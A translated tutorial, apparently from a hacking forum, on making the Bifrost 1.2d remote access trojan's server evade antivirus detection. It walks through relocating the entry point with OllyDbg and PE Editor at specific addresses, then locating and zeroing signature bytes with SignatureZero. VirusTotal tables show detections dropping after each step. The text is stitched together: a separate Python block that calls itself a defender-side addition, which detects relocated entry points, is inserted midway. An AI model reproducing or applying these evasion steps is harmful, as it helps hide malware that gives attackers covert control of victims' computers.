1. Objective

The aim is to make the server of Bifrost 1.2d, the latest version of this remote-control tool, undetectable to antivirus software.

Software required   Description                                                        Download
Bifrost 1.2d        R.A.T. (Remote Access Trojan), more commonly known as a Trojan

2. Why this version?

  • It is the most stable RAT (Remote Access Trojan) created so far, and it works on all Windows operating systems.
  • It is FWB, that is to say it is the server that connects to the client, creating the connection through the network.
  • It has the particularity of bypassing firewalls and routers.
  • It has an integrated Ring0 rootkit.

"Strange," you tell me. "How can malware bypass a firewall and a router when the NAT of the network the infected PC sits on is not configured for it?"
Well, it is done by injecting code into a process that has the right to talk to the web.
Injection is a method that, as its name suggests, injects code into the address space of an application that already has rights at the firewall level (a web browser or your favourite messenger, for example) and uses its connection to communicate with the client.

Injection does not bypass the heuristic defences of antivirus software.

3. Stages of undetectability

First possibility

Let's start by checking how our server fares against the antivirus engines; for that I will use virustotal.com as a test, an online scanner that runs about thirty antivirus engines.
The server that I create and test on VirusTotal will soon be detected by the antivirus vendors (the next day, for AVG), because virustotal.com forwards suspicious files to the antivirus companies.

Second Possibility

Alternatives exist, such as the Mini AV's Scan software published by Activespy.org.

Download (password: activespy.org)

Tutorial: http://rapidshare.de/files/39357402/Mini_AV_Scanner_Tutorial.rar

Additional antivirus

Antivirus            Version   Download
Kaspersky            8.0       http://dnl-eu9.kaspersky-labs.com/trial/registered/T8NUGHY6XWLOJ7VEMFIB/kav8.0.0.357fr.exe
Avast Professional   4.8       http://download674.avast.com/iavs4pro/setupfrepro.exe
AVG                  8.0       http://download.avg.com/filedir/inst/avg_avwt_stf_g7_8_156a1345.exe
NOD32                3.0       http://www.eset-nod32.fr/telecharger_evaluations.html
Norman                         http://www.norman.com/Download/Trial_versions/fr/fr

This is the first scan of our original server on VirusTotal.

Antivirus            Version          Update       Result
Ahnlab-V3            2008.8.5.0       2008.08.05   Win-Trojan/Midgare.32256
AntiVir              7.8.1.15         2008.08.05   TR/Spy.Banker.AAUT.14
Authentium           5.1.0.4          2008.08.05   W32/Backdoor2.CBJB
Avast                4.8.1195.0       2008.08.05   Win32:Crypt-CIK
AVG                  8.0.0.156        2008.08.05   BackDoor.Generic9.ASJE
BitDefender          7.2              2008.08.05   Trojan.Spy.Banker.AAUT
CAT-QuickHeal        9.50             2008.08.04   Trojan.Midgare.fvp
ClamAV               0.93.1           2008.08.05   Trojan.Bifrose-3265
DrWeb                4.44.0.09170     2008.08.05   Trojan.Inject.3631
eSafe                7.0.17.0         2008.08.05   Win32.Midgare.fcz
eTrust-Vet           31.6.6009        2008.08.05   Win32/VMalum.DCPV
Ewido                4.0              2008.08.05   Trojan.Midgare.fcz
F-Prot               4.4.4.56         2008.08.04   W32/Backdoor2.CBJB
F-Secure             7.60.13501.0     2008.08.05   Trojan.Win32.Midgare.fcz
Fortinet             3.14.0.0         2008.08.05   BDoor.CEP!tr.bdr
Gdata                2.0.7306.1023    2008.08.05   Trojan.Win32.Midgare.fcz
Ikarus               T3.1.1.34.0      2008.08.05   Trojan.Win32.Midgare.eni
K7AntiVirus          7.10.404         2008.08.05   Trojan.Win32.Midgare.fcz
Kaspersky            7.0.0.125        2008.08.05   Trojan.Win32.Midgare.fcz
McAfee               5353             2008.08.04   BackDoor-CEP.gen.a
Microsoft            1.3807           2008.08.05   Trojan:Win32/Midgare.A
NOD32v2              3328             2008.08.05   probably a variant of Win32/Agent
Norman               5.80.02          2008.08.05   W32/Smalldoor.BMLD
Panda                9.0.0.4          2008.08.04   Not detected
PCTools              4.4.2.0          2008.08.05   Not detected
Prevx1               V2               2008.08.05   System Back Door
Rising               20.56.12.00      2008.08.05   Not detected
Sophos               4.31.0           2008.08.05   Mal/Generic-A
Sunbelt              3.1.1537.1       2008.08.01   Trojan.Win32.Midgare.fcz
Symantec             10               2008.08.05   Backdoor.Trojan
TheHacker            6.2.96.393       2008.08.04   Trojan/Midgare.eni
TrendMicro           8.700.0.1004     2008.08.05   BKDR_AHZE.A
VBA32                3.12.8.2         2008.08.05   Trojan.Win32.Midgare.hhn
ViRobot              2008.8.5.1324    2008.08.05   Trojan.Win32.Midgare.32256
VirusBuster          4.5.11.0         2008.08.04   Backdoor.Bifrose.GUF
Webwasher-Gateway    6.6.2            2008.08.05   Trojan.Spy.Banker.AAUT.14

At this point, with the original server, we can already see that some antivirus engines are out of date, even though the stub has been on the net for several weeks; but what is the security multinational Panda Software doing?
The stub is the body of the server onto which the data you give the builder is grafted: the client's IP address or the No-IP address for its router, the installation method, and so on. In short, all the information you enter in the builder when you create your server.

  • The size of the original Bifrost 1.2d stub is 32,256 bytes.

4. The various stages

  1. Changing the entry point
  2. Detecting and modifying a viral signature


5. Changing the entry point

The principle of this method is to move the entry point into an empty area of the code.

Software required   Description                                                     Download
OllyDbg 2.0         Lets you disassemble an application and modify its ASM code.    http://www.ollydbg.de/odbg200g.zip
PE Editor 1.7       PE resource editor; used here to change the entry point.        http://download.softpedia.ro/dl/454590ac0f18a57fb2a6830285bba264/48987a72/100000028/software/UTILE/PEditor1.7.zip

Run OllyDbg and analyse our server.
When you open your server, it asks whether to unpack it; do so.

We are now in the OllyDbg interface with the server disassembled:

  • The entry point is on line 00407C89; it is greyed out.
    We will highlight the lines that interest us.

  • Then right-click > Binary > Binary copy. Now look for a free area where I can put my entry point.
    Further down in the server you will find an empty area; it looks like this:

  • Now insert our entry point into the free zone.
    Highlight at least thirty blank lines and right-click > Binary > Binary paste.

    You get this:

  • We will then add several instructions one after another.
    It is important to uncheck "Fill with NOP's" for the following operations!
    Double-click on the instruction column of the line, 00407EF3 in my case.

  • Enter PUSH 1 and click Assemble; you get this:

  • Now scroll to line 00407F06 and give it the following instructions:

Address to change   Instruction to add   Explanation
00407F06            JMP 00407C9E         Jumps back to line 00407C9E
00407F07            PUSH 2               Repositions the stack
00407F08            PUSH 2               Repositions the stack
00407F09            NOP                  Does nothing
00407F09            NOP                  Does nothing

  • The JMP goes back to 00407C9E, which is just below the start of the stack.

  • You must end up with this:

Now let's modify our server

  • To return to the entry point, right-click > Go to > Origin. This brings us back to our original entry point; in the same way we will modify the instructions there.
    To do this, we will add 12 NOPs in a row, starting from the entry-point line, which is 00407C89.

    You must get this:

  • Back on the first line, 00407C89, replace the instruction MOV EAX, 321 with NOPs and then finish with a series of PUSH EBP. You must get this:

  • To save the modifications:
    Right-click > Copy to executable > All modifications, then Copy all.

    To save your modified server:
    Right-click > Save file

    There, our ASM changes in OllyDbg are complete; it is essential to close OllyDbg before the next operations.
    We will now change the entry point with PE Editor 1.7.

    Launch it and load your server.

  • The original entry point is at the top left: 00007C89. This is where we put our new entry point.
    In ASM our new entry point was 00407EF3.

    For our new entry point in PE Editor, we need to change the 4 to a 0, which gives 00007EF3.
    Put the new entry point in place of the old one and click Apply Changes.

  • The first modification of the server is finished, and it works very well.

  • Let's now look at the VirusTotal results:

Antivirus            Version          Update       Result
Ahnlab-V3            2008.8.5.0       2008.08.05   Not detected
AntiVir              7.8.1.15         2008.08.05   TR/Spy.Banker.AAUT.14
Authentium           5.1.0.4          2008.08.05   Not detected
Avast                4.8.1195.0       2008.08.05   Win32:Crypt-CIK
AVG                  8.0.0.156        2008.08.05   BackDoor.Generic9.ASJE
BitDefender          7.2              2008.08.05   Trojan.Spy.Banker.AAUT
CAT-QuickHeal        9.50             2008.08.04   Not detected
ClamAV               0.93.1           2008.08.05   Not detected
DrWeb                4.44.0.09170     2008.08.05   Trojan.Inject.3631
eSafe                7.0.17.0         2008.08.05   Win32.Midgare.fcz
eTrust-Vet           31.6.6009        2008.08.05   Not detected
Ewido                4.0              2008.08.05   Not detected
F-Prot               4.4.4.56         2008.08.04   Not detected
F-Secure             7.60.13501.0     2008.08.05   Trojan.Win32.Midgare.fcz
Fortinet             3.14.0.0         2008.08.05   Not detected
Gdata                2.0.7306.1023    2008.08.05   Trojan.Win32.Midgare.fcz
Ikarus               T3.1.1.34.0      2008.08.05   Trojan.Win32.Midgare.eni
K7AntiVirus          7.10.404         2008.08.05   Not detected
Kaspersky            7.0.0.125        2008.08.05   Trojan.Win32.Midgare.fcz
McAfee               5353             2008.08.04   BackDoor-CEP.gen.a
Microsoft            1.3807           2008.08.05   Trojan:Win32/Midgare.A
NOD32v2              3328             2008.08.05   Not detected
Norman               5.80.02          2008.08.05   Not detected
Panda                9.0.0.4          2008.08.04   Not detected
PCTools              4.4.2.0          2008.08.05   Not detected
Prevx1               V2               2008.08.05   Not detected
Rising               20.56.12.00      2008.08.05   Not detected
Sophos               4.31.0           2008.08.05   Not detected
Sunbelt              3.1.1537.1       2008.08.01   Not detected
Symantec             10               2008.08.05   Not detected
TheHacker            6.2.96.393       2008.08.04   Not detected
TrendMicro           8.700.0.1004     2008.08.05   Not detected
VBA32                3.12.8.2         2008.08.05   Not detected
ViRobot              2008.8.5.1324    2008.08.05   Not detected
VirusBuster          4.5.11.0         2008.08.04   Backdoor.Bifrose.GUF
Webwasher-Gateway    6.6.2            2008.08.05   Trojan.Spy.Banker.AAUT.14

More than half of the antivirus engines have already been defeated, but many still resist; so let's continue our investigation into undetectability.
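A defender-side addition that is not part of this tutorial: moving the entry point as described above leaves a measurable artefact, an AddressOfEntryPoint that points into the zero-padded slack of the code section (past its VirtualSize, inside SizeOfRawData) rather than into the section's real code. The Python below parses the PE headers with only the standard library and flags that condition; the two images it checks are constructed in code with a hypothetical layout, so no real sample is needed.

```python
import struct

def parse_pe(data):
    """Return (entry_rva, sections) from the PE headers; sections are dicts."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    entry_rva = struct.unpack_from("<I", data, pe + 24 + 16)[0]
    secs = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, pe + 24 + opt_size + 40 * i)
        secs.append(dict(name=name.rstrip(b"\0").decode(), vsize=vsize,
                         va=va, rawsize=rawsize, rawptr=rawptr))
    return entry_rva, secs

def entry_point_findings(data, window=64, zero_ratio=0.5):
    """Heuristics on where AddressOfEntryPoint lands; returns a list of findings."""
    entry_rva, secs = parse_pe(data)
    home = next((s for s in secs if s["va"] <= entry_rva
                 < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if home is None:
        return ["entry point maps to no section"]
    findings = []
    if entry_rva >= home["va"] + home["vsize"]:     # past the real code, in slack
        findings.append("entry point in raw-data slack past VirtualSize of %s" % home["name"])
    # Bytes around the entry point, clamped to the section's raw data on disk.
    off = home["rawptr"] + (entry_rva - home["va"])
    lo, hi = home["rawptr"], home["rawptr"] + home["rawsize"]
    around = data[max(lo, off - window):min(hi, off + window)]
    if around and around.count(0) / len(around) >= zero_ratio:
        findings.append("entry point neighbourhood is %d%% zero bytes"
                        % round(100 * around.count(0) / len(around)))
    return findings

def build_pe(code, entry_rva, raw_size=0x400):
    """Constructed single-section PE32: headers, then .text at file offset 0x200."""
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224); struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, raw_size, 0x200,
                      0, 0, 0, 0, 0x60000020)
    return bytes((dos + coff + opt + sec).ljust(0x200, b"\0")) + code.ljust(raw_size, b"\0")

def demo():
    """Untouched image vs. one with the entry point moved into the slack (section 5)."""
    code = b"\x55\x8b\xec\x90" * 64              # 256 bytes of constructed filler code
    original = build_pe(code, 0x1000)              # entry point at the start of .text
    patched = bytearray(build_pe(code, 0x1300))    # entry point 0x200 bytes past the code
    patched[0x500:0x524] = b"\x6a\x01\x6a\x02\x90\x90" * 6   # 36-byte island in the slack
    return entry_point_findings(original), entry_point_findings(bytes(patched))
```

The zero-ratio threshold is a heuristic; packed or resource-heavy binaries need a second look before acting on a hit.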

6. Detecting and modifying a viral signature

Software required    Description                                       Download
Avast 4.8 Prof.      Antivirus.                                        http://download674.avast.com/iavs4pro/setupfrepro.exe
SignatureZero        Hexadecimal editor applying the split method.
Hex Workshop 5.1.3   Hex editor.                                       http://www.bpsoft.com/downloads/hw32v513.exe

Most antivirus engines detect malware thanks to a hexadecimal signature; this signature varies from one virus to another.

  • Some glaring examples to start with.
    Open your server in Hex Workshop and look at the top of the code; we can see a very distinctive string, which means that the MOU has been modified:

  • Make some small changes.

  • With this change you just bypassed Kaspersky, which will no longer detect it.
    Now let's move on to AVG, which also uses signature detection.

Replace Rich with whatever you want.

  • You have also bypassed AVG. Let's check it all on our favourite site, virustotal.com:
Antivirus            Version          Update       Result
Ahnlab-V3            2008.8.5.0       2008.08.05   Not detected
AntiVir              7.8.1.15         2008.08.05   TR/Spy.Banker.AAUT.14
Authentium           5.1.0.4          2008.08.05   Not detected
Avast                4.8.1195.0       2008.08.05   Win32:Crypt-CIK
AVG                  8.0.0.156        2008.08.05   Not detected
BitDefender          7.2              2008.08.05   Trojan.Spy.Banker.AAUT
CAT-QuickHeal        9.50             2008.08.04   Not detected
ClamAV               0.93.1           2008.08.05   Not detected
DrWeb                4.44.0.09170     2008.08.05   Trojan.Inject.3631
eSafe                7.0.17.0         2008.08.05   Win32.Midgare.fcz
eTrust-Vet           31.6.6009        2008.08.05   Not detected
Ewido                4.0              2008.08.05   Not detected
F-Prot               4.4.4.56         2008.08.04   Not detected
F-Secure             7.60.13501.0     2008.08.05   Not detected
Fortinet             3.14.0.0         2008.08.05   Not detected
Gdata                2.0.7306.1023    2008.08.05   Trojan.Win32.Midgare.fcz
Ikarus               T3.1.1.34.0      2008.08.05   Trojan.Win32.Midgare.eni
K7AntiVirus          7.10.404         2008.08.05   Not detected
Kaspersky            7.0.0.125        2008.08.05   Not detected
McAfee               5353             2008.08.04   BackDoor-CEP.gen.a
Microsoft            1.3807           2008.08.05   Trojan:Win32/Midgare.A
NOD32v2              3328             2008.08.05   Not detected
Norman               5.80.02          2008.08.05   Not detected
Panda                9.0.0.4          2008.08.04   Not detected
PCTools              4.4.2.0          2008.08.05   Not detected
Prevx1               V2               2008.08.05   Not detected
Rising               20.56.12.00      2008.08.05   Not detected
Sophos               4.31.0           2008.08.05   Not detected
Sunbelt              3.1.1537.1       2008.08.01   Not detected
Symantec             10               2008.08.05   Not detected
TheHacker            6.2.96.393       2008.08.04   Not detected
TrendMicro           8.700.0.1004     2008.08.05   Not detected
VBA32                3.12.8.2         2008.08.05   Not detected
ViRobot              2008.8.5.1324    2008.08.05   Not detected
VirusBuster          4.5.11.0         2008.08.04   Backdoor.Bifrose.GUF
Webwasher-Gateway    6.6.2            2008.08.05   Trojan.Spy.Banker.AAUT.14

7. The explanation with Avast

  • The split method consists of finding the signature that Avast detects.
    Suppose that the code of our server is signed by Avast on 6B8E B5A4.

  • To find this signature, we start by zeroing the lower half of the offsets and testing the exe with our antivirus, Avast. If it screams, we have not erased the signature; if it does not scream, we have erased it.

  • Save the result on a PC that has no exclusion set in the AV.
    Avast screams and we find the malware, which is normal because the signature is still visible.
    Put back the original bytes and this time zero the upper bytes, and so on until you get down to the incriminated bytes 6B8E B5A4; the aim is to narrow in on the signature.

    I find that a bit tedious for my taste, and browsing the net I found a small tool that does this job very well.

  • 1. Load the server
    2. Zero an offset
    3. Save the modified server
    4. Restore the offset's previous value
    5. Test it with the AV
  • The rest does not matter. It is the same principle as the method explained before; the sliders let us position ourselves in the code.
    You have already configured Avast with an exclusion for SignatureZero.exe and your server.exe.
    To configure SignatureZero, check Hexadecimal and select the directory that will be used to test the server; in my case, the Desktop.

  • Move the sliders so that the change shows in the display.
    I simply load the server in SignatureZero with Abrir archivo and click on Probar for a detection test.

  • You mark out a zone with the sliders, then click Rellenar con 0's; the part between the cursors turns red, meaning every offset in that part is now zero. Then click Probar to test.

Possible results

Undetected: the signature is among the offsets zeroed between the two sliders.
Detected: the signature is outside the offsets zeroed between the two sliders.

  • For my test, the signature is in my red zone; I click on Deshacer cambios to restore the offsets to their original values.
    You can click Rellenar con 0's repeatedly; the tool keeps a history of the changes.

    You narrow it down as much as possible and eventually you find the offending piece of code.

  • To finish, use the up and down arrows to select the offsets.

  • We have identified the signature precisely and deleted it; I save the result by clicking on Guardar archivo, and we will name it "Server Bifrost UD Avast.exe", for example.
    Now let's compare our new server with the old one in Hex Workshop and see what changed:

  • SignatureZero just changed the hexadecimal code at offset 00004F60 by setting it to zero. This solution works; otherwise, if 00 does not do the job, it is a matter of finding a suitable equivalent.
    In our case it works very well: we just bypassed Avast and, after testing, the server still works very well.

Greetz to 5moke, v00d00chile, KPCR, Xylitol, Sh0ck, P3lo, t0fx, Electricdr3ke, PHPlizardo, Oxygenique, Trap, Xash, Nesuw, acla, bestpig and everybody at europasecurity.org
